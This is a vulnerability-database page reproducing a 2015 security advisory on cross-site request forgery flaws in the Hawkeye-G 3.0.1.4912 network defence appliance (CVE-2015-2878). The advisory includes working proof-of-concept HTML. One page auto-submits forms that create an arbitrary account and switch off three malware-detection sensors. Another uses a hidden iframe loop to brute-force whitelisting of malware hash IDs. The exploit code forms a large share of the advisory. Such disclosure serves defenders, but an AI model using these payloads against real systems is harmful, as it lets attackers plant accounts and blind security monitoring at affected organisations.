Lucene search
K

Hawkeye-G 3.0.1.4912 Cross Site Request Forgery

🗓️ 24 Jul 2015 00:00:00Reported by hyp3rlinxType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 45 Views

Vulnerabilities in Hawkeye-G 3.0.1.4912 product allowing CSRF attacks to add accounts, modify network sensor settings, and whitelist malware MD5 hash IDs

Related
Code
ReporterTitlePublishedViews
Family
0day.today
Hawkeye-G v3.0.1.4912 CSRF Vulnerability
24 Jul 201500:00
zdt
CNVD
WatchGuard Hexis HawkEye G Cross-Site Request Forgery Vulnerability
10 Nov 201700:00
cnvd
CVE
CVE-2015-2878
23 Oct 201718:00
cve
Cvelist
CVE-2015-2878
23 Oct 201718:00
cvelist
Exploit DB
Hawkeye-G 3.0.1.4912 - Cross-Site Request Forgery
24 Jul 201500:00
exploitdb
EUVD
EUVD-2015-2966
7 Oct 202500:30
euvd
exploitpack
Hawkeye-G 3.0.1.4912 - Cross-Site Request Forgery
24 Jul 201500:00
exploitpack
NVD
CVE-2015-2878
23 Oct 201718:29
nvd
Prion
Cross site request forgery (csrf)
23 Oct 201718:29
prion
securityvulns
Hawkeye-G v3.0.1.4912 CSRF Vulnerability CVE-2015-2878
27 Jul 201500:00
securityvulns
Rows per page
`[+] Credits: John Page ( hyp3rlinx )  
  
[+] Domains: hyp3rlinx.altervista.org  
  
[+] Source: http://hyp3rlinx.altervista.org/advisories/AS-HAWKEYEG0724.txt  
  
  
Vulnerability Type:  
===================  
CSRF  
  
  
CVE Reference:  
==============  
CVE-2015-2878  
  
  
  
Vendor:  
===================  
www.hexiscyber.com  
  
  
  
Product:  
=====================================================================  
Hawkeye-G v3.0.1.4912  
  
Hawkeye G is an active defense disruptive technology that detects,  
investigates, remediates and removes cyber threats within the network.  
  
  
  
Advisory Information:  
====================================================  
  
Multiple CSRF(s) Vulnerabilities:  
  
  
Vulnerability Details:  
=====================  
  
1- CSRF Add arbitrary accounts to system  
------------------------------------  
  
vulnerable URL:  
https://localhost:8443/interface/rest/accounts/json  
  
vulnerable POST parameter:  
'name'  
  
  
2- CSRF modification of network sensor settings  
---------------------------------------------------------------------  
  
a) Turn off 'Url matching' Sensor  
b) Turn off 'DNS Inject' Sensor  
c) Turn off 'IP Redirect' Sensor  
  
vulnerable URL:  
https://localhost:8443/interface/rest/dpi/setEnabled/1  
  
vulnerable POST parameters:  
'url_match'  
'dns_inject'  
'ip_redirect'  
  
3- CSRF whitelisting of malware MD5 hash IDs  
------------------------------------------------------  
  
vulnerable URL:  
https://localhost:8443/interface/rest/md5-threats/whitelist  
  
vulnerable POST parameter 'id'  
  
  
  
CSRF Exploit code(s):  
====================  
  
  
<!DOCTYPE>  
<html>  
  
<script>  
  
/* Execute consecutive CSRF exploits */  
  
function ghostofsin(){  
var doc=document;  
var e1=doc.getElementById('exploit_1')  
e1.submit()  
var e2=doc.getElementById('exploit_2')  
e2.submit()  
var e3=doc.getElementById('exploit_3')  
e3.submit()  
var e4=doc.getElementById('exploit_4')  
e4.submit()  
}  
</script>  
  
<body onLoad="ghostofsin()">  
  
<!-- Add arbitrary accounts -->  
<form id="exploit_1" action="  
https://localhost:8443/interface/rest/accounts/json" method="post">  
<input type="text" name="human" value="true" />  
<input type="text" name="name" value="inverted_crosses" />  
<input type="text" name="domainId" value=""/>  
<input type="text" name="domain_id" value="" />  
<input type="text" name="roving" value="false" />  
</form>  
  
  
<!-- shutdown the 'Url Matching' Sensor that  
is responsible for detecting known malware domains -->  
  
<form id="exploit_2" action="  
https://localhost:8443/interface/rest/dpi/setEnabled/1" method="post">  
<input type="text" name="level" value="1" />  
<input type="text" name="enable" value="false" />  
<input type="text" name="attribute" value="url_match"/>  
</form>  
  
<!-- set the DNS Inject Network Sensor to off -->  
  
<form id="exploit_3" action="  
https://localhost:8443/interface/rest/dpi/setEnabled/1" method="post">  
<input type="text" name="level" value="1" />  
<input type="text" name="enable" value="false" />  
<input type="text" name="attribute" value="dns_inject"/>  
</form>  
  
<!-- set the IP Redirect Network Sensor to off -->  
  
<form id="exploit_4" action="  
https://localhost:8443/interface/rest/dpi/setEnabled/1" method="post">  
<input type="text" name="level" value="1" />  
<input type="text" name="enable" value="false" />  
<input type="text" name="attribute" value="ip_redirect"/>  
</form>  
  
</body>  
</html>  
  
  
Whitelist MD5 malware IDs CSRF:  
-------------------------------  
  
In final CSRF POC to try an white list malware MD5 IDs will be a bit more  
complex,  
we need to submit form many times hidden in background using iframe so we  
stay on same page.  
Seems all MD5 ID's end in 0001 and are 8 bytes in length, we just need a  
loop an create some  
numbers 8 bytes long and dynamically assign the 'id' value of the field and  
execute multiple  
POST requests in background, it will be hit or miss unless you know ahead  
of time the MD5 ID  
in the database your targeting.  
  
e.g. Malware MD5 database ID 28240001  
  
So Here we go!...  
  
<!-- whitelist MD5 malware IDs -->  
  
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"  
"http://www.w3.org/TR/html4/loose.dtd">  
<html>  
<head>  
<title>CSRF POC hyp3rlinx</title>  
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">  
</head>  
<body>  
<form id="hell" action="  
https://localhost:8443/interface/rest/md5-threats/whitelist"  
target="demonica" method="post">  
<input type="hidden" name="id" id="id"><br>  
</form>  
<IFRAME style="display:none" name="demonica"></IFRAME>  
<script>  
var doc=document  
var x=1000  
exorcism()  
function exorcism(){  
x++  
String(x)  
x+="0001"  
var f=doc.getElementById('hell')  
var e=doc.getElementById('id')  
e.value=x  
x=x.substr(0,4)  
f.submit()  
}  
setInterval("exorcism()",100)  
</script>  
</body>  
</html>  
  
  
  
Disclosure Timeline:  
=========================================================  
Vendor Notification: June 30, 2015  
July 24, 2015 : Public Disclosure  
  
  
  
Severity Level:  
=========================================================  
High  
  
  
  
Description:  
==========================================================  
  
Request Method(s): [+] POST  
  
  
Vulnerable Product: [+] Hawkeye-G v3.0.1.4912  
  
  
Vulnerable Parameter(s): [+] name, enable, id  
  
  
Affected Area(s): [+] Network Threat Appliance, Local Domain  
  
  
============================================================================  
  
[+] Disclaimer  
Permission is hereby granted for the redistribution of this advisory,  
provided that it is not altered except by reformatting it, and that due  
credit is given. Permission is explicitly given for insertion in  
vulnerability databases and similar, provided that due credit is given to  
the author.  
The author is not responsible for any misuse of the information contained  
herein and prohibits any malicious use of all security related information  
or exploits by the author or elsewhere.  
  
  
(hyp3rlinx)  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

24 Jul 2015 00:00Current
0.6Low risk
Vulners AI Score0.6
EPSS0.00333
45